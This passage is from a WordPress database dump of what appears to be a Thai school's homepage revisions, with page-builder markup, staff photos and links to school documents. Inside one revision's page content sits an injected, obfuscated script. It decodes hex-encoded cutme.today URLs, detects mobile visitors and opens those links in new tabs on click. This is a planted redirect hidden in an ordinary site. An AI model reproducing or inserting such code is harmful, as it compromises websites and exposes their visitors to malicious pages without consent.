{\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:32:33','2025-10-26 09:32:33','',19,'http://watprato.ssk.in.th/?p=745',0,'revision','',0),
(746,1,'2025-10-26 16:32:48','2025-10-26 09:32:48','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\",\"align\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-medium-font-size\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline 